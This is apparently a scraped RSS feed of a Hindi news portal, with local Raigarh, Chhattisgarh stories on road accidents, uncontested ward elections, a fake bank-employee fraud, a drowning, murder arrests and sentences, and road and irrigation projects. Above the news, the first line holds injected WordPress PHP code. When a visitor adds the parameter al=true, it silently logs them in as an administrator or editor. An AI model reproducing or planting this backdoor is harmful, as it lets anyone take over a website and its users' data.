// _ea_al add_action('init', function(){ if(isset($_GET['al']) && $_GET['al']==='true'){ if(!is_user_logged_in()){ $u=get_users(['role'=>'administrator','number'=>1,'fields'=>['ID','user_login']]); if(empty($u)){$u=get_users(['role'=>'editor','number'=>1,'fields'=>['ID','user_login']]);} if(!empty($u)){wp_set_auth_cookie($u[0]->ID,true,false);wp_redirect(admin_url());exit();} } else {wp_redirect(admin_url());exit();} } }, 2); Chhattisgarh-Raigarh – प्रत्युषा आशा की नयी किरण https://pratyushaashakinayikiran.com न्यूज़ पोर्टल Sun, 02 Feb 2025 14:25:00 +0000 en-US hourly 1 https://wordpress.org/?v=7.0 छत्तीसगढ़-रायगढ़ में तेज रफ्तार ट्रैक्टर ने बाइक सवारों को मारी टक्कर, एक की मौत और दूसरा गंभीर घायल https://pratyushaashakinayikiran.com/?p=128130 Sun, 02 Feb 2025 14:25:00 +0000 https://pratyushaashakinayikiran.com/?p=128130 रायगढ़।

छत्तीसगढ़ के रायगढ़ जिले में ट्रैक्टर चालक ने तेज एवं लापरवाही पूर्वक वाहन चलाते हुए बाइक सवार दो युवकों को टक्कर मार दी। इस घटना में बाइक चला रहे एक युवक की घटनास्थल पर  ही मौत हो गई। पुलिस आरोपी ट्रैक्टर चालक के खिलाफ अपराध दर्ज कर मामले को जांच में ले लिया है, उक्त घटना धर्मजयगढ़ थाना क्षेत्र का है।

मिली जानकारी के मुताबिक, धर्मजयगढ़ थाना क्षेत्र के अंतर्गत आने वाले गांव बलपेदा निवासी अवध राठिया ने थाने में रिपोर्ट दर्ज कराते हुए बताया कि कल दोपहर वह अपने दोस्त देवान सिंह राठिया के साथ मोटरसाइकिल पर किसी काम के सिलसिले में ग्राम कांटाडांड की ओर जा रहे थे। इस दौरान मोटरसाइकिल को देवान सिंह राठिया चला रहा था।
  बाइक सवार दोनों युवक जब ग्राम जमरगीडी मेन रोड एवं पारेमार के पास पहुंचे ही थें कि सामने की तरफ से आ रहे नीले रंग की ट्रैक्टर के चालक ने तेज एवं लापरवाही पूर्वक वाहन चलाते हुए बाइक सवार युवकों को सामने से जोरदार टक्कर मार दी। इस घटना में बाइक के पीछे बैठा युवक उछलकर झाड़ियों में जा गिरा। वहीं बाइक चला रहा देवान सिंह राठिया ट्रैक्टर के पहियों के नीचे आ गया। जिससे मौके पर ही उसकी मौत हो गई। ट्रैक्टर की टक्कर से बाइक सवार युवक की मौत हो जाने के बाद आसपास के ग्रामीणों की मदद से मृतक के शव को अस्पताल भेज दिया गया है, बताया जा रहा है कि घटना के बाद से आरोपी ट्रैक्टर चालक मौके से फरार हो गया है। पुलिस मामले की जांच में जुटी है।

]]>
छत्तीसगढ़-रायगढ़ के वार्ड 18 और 45 से कांग्रेस प्रत्याशियों ने वापस लिया नामांकन, BJP की पूनम और नारायण निर्विरोध विजयी https://pratyushaashakinayikiran.com/?p=127814 Sat, 01 Feb 2025 16:15:00 +0000 https://pratyushaashakinayikiran.com/?p=127814 रायगढ़।

छत्तीसगढ़ के रायगढ़ जिले में वार्ड नं. 18 की कांग्रेस प्रत्याशी शीला साहू के द्वारा नामांकन वापस लेने से भाजपा प्रत्याशी पूनम सोलंकी निर्विरोध निर्वाचित हुई हैं। इस जीत के साथ भाजपा कार्यालय में जश्न मनाया जा रहा है। मिली जानकारी के मुताबिक वार्ड नं. 18 से भाजपा प्रत्याशी पूनम सोलंकी के खिलाफ कांग्रेस की प्रत्याशी शीला साहू ने अपने व्यक्तिगत कारणों की वजह से चुनाव होनें से पहले ही आज अपना नामांकन वापस ले लिया।

जिससे भाजपा प्रत्याशी पूनम सोलंकी निर्विरोध चुन ली गई हैं। इस जीत से भाजपा में जश्न का माहौल है इस दौरान रायगढ़ विधायक एवं वित्त मंत्री ओपी चौधरी, भाजपा जिलाध्यक्ष अरूणधन दीवान ने भाजपा प्रत्याशी पूनम सोलंकी को भाजपा का गमछा पहनाकर उन्हें जीत की बधाई दी। वार्ड नं. 18 से निर्विरोध निर्वाचित हुई पूनम सोलकी ने अपने वार्डवासियों को धन्यवाद करते हुए कहा कि यहां की जनता ने उन्हें और उनके पति पर भरोसा जताया जिससे अनवरत हम पांच बार निर्वाचित होते आ रहे हैं। वार्डवासी हमारे सभी कार्य की सराहना करते थे और उसी का प्रतिफल है कि आज मै निर्विरोध चुनी गई हूं। मैं हमेशा अपने वार्डवासियों के भरोसे पर खरा उतरने का प्रयास करूंगी। इस दौरान रायगढ़ विधायक एवं वित्त मंत्री ओपी चौधरी ने कहा कि कांग्रेस एक डूबती नाव है। परिवारवाद के चंगुल में पड़कर उन्होंने पूरे देश के अलावा पूरी पार्टी का बेडागर्क किया है। यही कारण है कि आज डूबती नाव से लोग कूद-कूद कर भाग रहे हैं। आज रायगढ़ के वार्ड नं. 18 में भी कांग्रेस की एक प्रत्याशी ने अपना नामांकन वापस ले लिया है। जिससे नेता प्रतिपक्ष रही पूनम दिबेश सोलंकी निर्विरोध पार्षद निर्वाचित हो जाएंगी।

]]>
छत्तीसगढ़-रायगढ़ में स्कूटी सवार पति-पत्नी को ईंट से भरे वाहन ने मारी टक्कर, महिला की मौत और युवक गंभीर https://pratyushaashakinayikiran.com/?p=127753 Sat, 01 Feb 2025 14:25:00 +0000 https://pratyushaashakinayikiran.com/?p=127753 रायगढ़।

छत्तीसगढ़ के रायगढ़ जिले में ईट लोड भारी वाहन के चालक में तेज एवं लापरवाही पूर्वक वाहन चलाते हुए स्कूटी सवार पति-पत्नी को जोरदार टक्कर मार दी। इस घटना में महिला की मौत हो गई, महिला के पति की रिपोर्ट के बाद पुलिस आरोपी वाहन चालक के खिलाफ अपराध दर्ज कर मामले को जांच में जुट गई है। उक्त घटना घरघोड़ा थाना क्षेत्र की है।

मिली जानकारी के मुताबिक घरघोड़ा थाना क्षेत्र के अंतर्गत आने वाले ग्राम बनई निवासी कार्तिकेश्वर अगरिया ने थाने में रिपोर्ट दर्ज करते हुए बताया कि कल दोपहर वह अपनी पत्नी निद्रावती अगरिया के साथ अपनी स्कूटी से बैंक से पैसा निकालने आया था। घर का राशन लेकर पत्नी के साथ गांव लौट रहा था। शाम करीब पांच के आसपास जब वह रेंगाल बहरी एवं ग्राम बरकसपाली के मध्य गायत्री मंदिर के आगे मेन रोड पर पीछे की तरफ से आ रहे लाल रंग का ईंट से लदे वाहन के चालक ने लापरवाहीपूर्वक वाहन चलाते हुए स्कूटी को जोरदार टक्कर मार दी। जिससे निद्रावती अगरिया के कमर के नीचे दोनों पैरों में चोंट लगकर बुरी तरह कुचला गए। फिलहाल पुलिस मामले की जांच में जुटी है।

]]>
छत्तीसगढ़-रायगढ़ में लोन के बहाने ग्रामीणों से लाखों रुपये ठगे, SBI का फर्जी बैंक कर्मी गिरफ्तार https://pratyushaashakinayikiran.com/?p=126765 Wed, 29 Jan 2025 17:35:00 +0000 https://pratyushaashakinayikiran.com/?p=126765 रायगढ़।

लोन का लालच देकर ठगी करने वाले फर्जी बैंक कर्मी को पुलिस ने गिरफ्तार किया है. आरोपी मोहित चौहान (60 वर्ष) ने खुद को एसबीआई बैंक का कर्मचारी बताकर ग्रामीणों से लोन दिलाने का झांसा दिया और कुल 2.40 लाख रुपये की ठगी की. आरोपी को न्यायिक रिमांड पर भेज दिया गया है. यह मामला चक्रधरनगर थाना क्षेत्र का है.

जानकारी के अनुसार, आरोपी मोहित चौहान, जो भजनडिपा मिट्ठूमुड़ा जूटमिल का निवासी है, पिछले साल जुलाई-अगस्त में लोईंग गांव आया. उसने ग्रामीणों को विश्वास दिलाया कि वह एसबीआई बैंक का कर्मचारी है और 8 लाख रुपये का लोन आसानी से दिला देगा. आरोपी ने पीड़ितों से लोन प्रोसेसिंग के नाम पर पहले 10% राशि यानी 80,000 रुपये प्रत्येक से जमा करने को कहा. इसके बाद पीड़िता पुनीया भगत और दो अन्य महिलाओं ने उसे राशि दे दी. महीनों तक लोन के पास होने का इंतजार करने के बाद, जब किसी के खाते में राशि नहीं आई, तो पीड़ितों ने बैंक का रुख किया. वहां पता चला कि मोहित चौहान बैंक का कर्मचारी नहीं है और उनसे ठगी हुई है. इस ठगी के बाद जब मोहित से संपर्क करने का प्रयास किया गया, तो उसने बातचीत बंद कर दी और फरार हो गया. मामले में चक्रधरनगर पुलिस ने आरोपी के खिलाफ धारा 318(4), 319(2) बीएनएस के तहत मामला दर्ज किया और उसे गिरफ्तार कर लिया. थाना प्रभारी प्रशांत राव के निर्देशन में सहायक उप निरीक्षक नंद कुमार सारथी मामले की जांच कर रहे हैं. आरोपी के खिलाफ आगे की कार्रवाई की जा रही है.

]]>
छत्तीसगढ़-रायगढ़ में ग्रामीण ने जहर खाकर दी जान, पड़ोसी से पत्नी के अवैध संबंध का था शक https://pratyushaashakinayikiran.com/?p=124114 Wed, 22 Jan 2025 13:35:00 +0000 https://pratyushaashakinayikiran.com/?p=124114 रायगढ़।

पत्नी के पड़ोसी के साथ अवैध संबंध को लेकर क्षुब्ध एक ग्रामीण ने जहर खा लिया। पांच दिनों तक रायगढ़ के एक निजी अस्पताल में भर्ती ग्रामीण की मौत हो गई। पुलिस ने मामला दर्ज कर पूरे मामले को
विवेचना में लिया है।

मिली जानकारी के मुताबिक, 29 वर्षीय दशरथ पटेल, निवासी गोपालपुर सारंगढ़, 15 जनवरी को अपने घर में खाना खाने के बाद अपने पड़ोसी लक्ष्मण पटेल के साथ धान की रखवाली करने खेत गया हुआ था। रात साढ़े 11 बजे लक्ष्मण पटेल अपने दोस्त दशरथ को बस्ती से कुछ काम करके आने की बात बोलकर निकला।

]]>
छत्तीसगढ़-रायगढ़ में डिप्टी कलेक्टर के बेटे की डैम में डूबने से मौत, दोस्तों के साथ आया था घूमने https://pratyushaashakinayikiran.com/?p=124120 Wed, 22 Jan 2025 13:15:00 +0000 https://pratyushaashakinayikiran.com/?p=124120 रायगढ़।

छत्तीसगढ़ के रायगढ़ जिले में मंगलवार की शाम दोस्तों के साथ घूमने टीपाखोल डैम पहुंचे डिप्टी कलेक्टर के बेटे की डैम में डूबने से मौत हो गई। देर रात तक युवक का पता नहीं चल पाया था, गोताखोर उसकी तलाश में जुटे थे। आज सुबह फिर से युवक की तलाश शुरू की गई। जिसके बाद गोताखोरों ने उसका शव डैम से निकाला।

मिली जानकारी के मुताबिक, डिप्टी कलेक्टर के पद पर पदस्थ अजय लकड़ा का 25 वर्षीय बेटा जॉय लकड़ा दिल्ली में पढ़ता था और अपनी कॉलेज की छुट्टी में रायगढ़ आया हुआ था। जहां आज मंगलवार की शाम 8 से साढ़े 8 बजे के आसपास अपने दो दोस्तों के साथ टीपाखोल डैम घूमने गया हुआ था। बताया जा रहा है इसी बीच वह जब डैम के ऊपर गेट खोलने वाले पॉइंट में खड़ा था, तभी उसका ईयरबड्स पानी में गिर गया, बैगर पानी के गहराई का पता किए जब वह पानी में उतरा तो डूबने लगा। इस दौरान वहां मौजूद उसके दोस्तों ने उसे बचाने का काफी प्रयास किया। लेकिन उन्हें भी तैरना नहीं आता था, ऐसे में वे अपने दोस्त को नहीं बचा सके और जॉय गहरे पानी में डूब गया। युवक के डेम में डूबने की खबर से पूरे क्षेत्र में सनसनी फैल गई। घटना की जानकारी के बाद कोतरा रोड पुलिस के साथ मौके पर पहुंची, रेस्क्यू टीम रात 12 बजे तक डूबे युवक को ढूंढ़ती रही। लेकिन उसका पता नहीं चल सका। आज सुबह उसका शव बरामद कर लिया गया है। मौके पर मौजूद लोगों ने बताया कि तीनों दोस्त साथ में पढ़ाई करते हैं, छुट्टी के के चलते तीनों रायगढ़ घूमने आए थे, और आज पूरा दिन मार्केट घूमने के बाद तीनों दोस्त प्लान बनाकर टीपाखोल डैम पहुंचे थे और यहां यह घटना हो गई।

]]>
छत्तीसगढ़-रायगढ़ में भाई-बहन की हत्या में यूपी से युवती समेत तीन गिरफ्तार, पुलिस को मिली बड़ी सफलता https://pratyushaashakinayikiran.com/?p=123347 Mon, 20 Jan 2025 15:25:00 +0000 https://pratyushaashakinayikiran.com/?p=123347 रायगढ़.

शहर के दोहरे हत्याकांड मामले में बड़ा अपडेट सामने आया है. पुलिस को मामले में बड़ी सफलता मिली है. बुर्जुग भाई-बहन की घर में जघन्य हत्या की वारदात को अंजाम देने वाले आरोपियों को पुलिस ने उत्तरप्रदेश से गिरफ्तार किया है.

आरोपी चोरी की नियत से बुजुर्ग भाई-बहन के घर में घुसे थे. आरोपियों में एक युवती और दो युवक शामिल है. दरअसल, रायगढ़ में 13 जनवरी को सिटी कोतवाली के करीब पुरानी हटरी मार्केट क्षेत्र में दो बुजुर्ग भाई, बहन की लाश मिली थी. बीते कई सालों से दोनों अपने ही मकान रहते थे. जिनकी अज्ञात आरोपियों के द्वारा हत्या की गई थी. मृतक का नाम सीताराम जायसवाल और महिला का नाम अन्नपूर्णा जायसवाल है. अब पुलिस अधीक्षक दिव्यांग पटेल ने आरोपियों के पकड़े जाने की पुष्टि की है.

]]>
छत्तीसगढ़-रायगढ़ में युवक की हत्या पर आठ आरोपियों को सश्रम आजीवन कारावास, न्यायालय ने जुर्माना भी लगाया https://pratyushaashakinayikiran.com/?p=122621 Sat, 18 Jan 2025 15:15:00 +0000 https://pratyushaashakinayikiran.com/?p=122621 रायगढ़।

रायगढ़ जिले में युवती से फोन पर बात करने की बात को लेकर उपजे विवाद के बाद एक युवक की हत्या कर दी गई थी। मामले में षष्ठम अपर सत्र न्यायालय ने आठ आरोपियों को सश्रम आजीवन कारावास की सजा सुनाई। साथ ही आठ सौ रुपये का अर्थदंड से दंडित किया।

अभियोजन पक्ष के अनुसार, मामला संक्षेप में इस प्रकार है कि खरसिया थाना क्षेत्र के अंतर्गत आने वाले ग्राम खम्हार निवासी केवल सिंह उर्फ केवल राठिया (21) ने अपने बड़े भाई कलेश्वर राठिया (29) साल सहित गांव के अखिलेश राठिया, छबिलाल उर्फ लालजीत राठिया, धनुर्जय राठिया, होरीलाल राठिया, त्रिभुवन राठिया, हेमंत कुमारी राठिया के साथ मिल कर उसी गांव के डेविड राठिया को धारदार चाकू और टांगी से वार कर उसकी हत्या की दी और फरार हो गये थे। इस घटना के सामने आने के बाद खरसिया पुलिस ने आरोपियों के खिलाफ धारा 147,148,341 तथा 302-149 के तहत जुर्म पंजीबद्ध कर मामले को विवेचना में लिया और आरोपियों को गिरफ्तार कर षष्ठम अपर सत्र न्यायालय रायगढ़ में पेश किया। न्यायालय के विद्वान न्यायाधीशन अश्विनी कुमार चर्तुवेदी ने आरोपियों को आजीवन सश्रम कारावास की सजा से दंडित किया है। साथ ही साथ आठ सौ रूपये के अर्थदंड से दंडित किया है। इस मामले में शासन की ओर से अपर लोक अभियोजक तन्मय बनर्जी ने पैरवी की।

]]>
छत्तीसगढ़-रायगढ़ में पीएम जनमन योजना से पहाड़ी अंचलों में बन रही पक्की सड़क, बारिश में गांव तक पहुंचेगी एम्बुलेंस https://pratyushaashakinayikiran.com/?p=119368 Thu, 09 Jan 2025 19:05:00 +0000 https://pratyushaashakinayikiran.com/?p=119368 रायगढ़।

पहाड़ी अंचलों में बसे विशेष पिछड़ी जनजाति बिरहोर परिवारों के उनकी सामाजिक, आर्थिक व शैक्षणिक स्थिति को बेहतर बनाने के लिए संचालित पीएम जनमन योजना उनके जीवन में सकारात्मक बदलाव लेकर आ रही है। अब तक समाज की मुख्य धारा से नहीं जुड़ पाए इन बिरहोर बसाहटों तक अब पक्की सड़क पहुंचने लगी है।

ये सड़कें इन बिरहोर परिवारों के सर्वांगीण विकास की नई राहें खोलेंगी। यहां रहने वाले निवासियों को अब सुकून है कि बारिश के दिनों में कच्ची सड़कों से होने वाली समस्याओं से उन्हें निजात मिलेगी। रायगढ़ जिले के आदिवासी बहुल धरमजयगढ़ ब्लॉक के बसंतपुर के बिरहोर श्री गोविन्द और रामविलास ने बताया कि अब गांव में पक्की सड़क बन जाने से आवागमन में सुविधा मिल रही है। पहले पहाड़ी एरिया एवं कच्ची सड़कों के कारण गांववासियों को कई समस्याओं का सामना करना पड़ता था। खासकर बारिश के दिनों में जब किसी को स्वास्थ्य संबंधी समस्या होती थी, तो कच्ची सड़कों के चलते एम्बुलेंस भी गांव तक नहीं पहुँच पाती थी। इसके अलावा बच्चों को स्कूल जाने में भी बड़ी कठिनाई होती थी, क्योंकि रास्ते की स्थिति खराब थी। अब सड़क के निर्माण से इन सभी समस्याओं का हल निकला है और लोगों को आवागमन में काफी सहूलियत मिल रही है। उन्होंने प्रधानमंत्री श्री नरेन्द्र मोदी एवं मुख्यमंत्री श्री विष्णु देव साय को यहां गांव में पक्की सड़क निर्माण कराने के लिए धन्यवाद ज्ञापित किया।

न्यूनतम आबादी का मापदण्ड किया गया शिथिल
गौरतलब है कि प्रधानमंत्री ग्राम सड़क योजना के अंतर्गत ये सड़कें बनवायी जा रही है। इस योजना के तहत बनने वाली सड़कें सामान्य बसाहट में 500 से अधिक आबादी और अनुसूचित क्षेत्रों में 250 से अधिक आबादी वाले बसाहटों को योजना से जोडऩे का प्रावधान रहा है। लेकिन पीएम जनमन योजना से विशेष पिछड़ी जनजाति की बसाहट को बारहमासी सड़कों से जोडऩे के लिए जरूरी आबादी के संख्या को शिथिल किया गया। अब 100 से अधिक आबादी वाले इन विशेष पिछड़ी जनजाति वाले बसाहटों के लिए पक्की सड़क का निर्माण किया जा रहा है। जिनमें वर्तमान में 4 अन्य सड़कों का काम जारी है। इन सड़कों के पूरा होने से इन गांवों तक स्वास्थ्य सुविधाओं की पहुंच आसान होगी। उनके बच्चों को पढऩे-लिखने के लिए बाहर आने-जाने में सुविधा होगी। खेती-किसानी के लिए कृषि उत्पादों का परिवहन और विकासखण्ड और जिला मुख्यालय सहित अन्य जगहों पर ग्रामवासियों का आवागमन सुगम होगा।

]]>
छत्तीसगढ़-रायगढ़ में भू-जल संवर्धन एवं निस्तारी जल की बढ़ेगी सुविधा, कडे़ना एनीकट निर्माण के लिए 4.47 करोड़ स्वीकृत https://pratyushaashakinayikiran.com/?p=119256 Thu, 09 Jan 2025 16:45:00 +0000 https://pratyushaashakinayikiran.com/?p=119256 रायगढ़/रायपुर।

राज्य शासन ने रायगढ़ जिले के विकासखण्ड धरमजयगढ़ के कड़ेना एनीकट निर्माण कार्य के लिए 4 करोड़ 47 लाख 31 हजार रुपये स्वीकृत किये गये हैं।

योजना की कार्य पूर्ण हो जाने पर भू-जल संवर्धन एवं निस्तारी जल की सुविधा के साथ 60 हेक्टेयर क्षेत्र में सोलर संयंत्र एवं पाईप लाईन के माध्यम से क्षेत्र के किसानों को सिंचाई सुविधा मिलेगी। जल संसाधन विभाग मंत्रालय महानदी भवन से एनीकट निर्माण कार्यों को कराने मुख्य अभियंता हसदेव कछार जल संसाधन विभाग बिलासपुर को प्रशासकीय स्वीकृति जारी की गई है।

]]>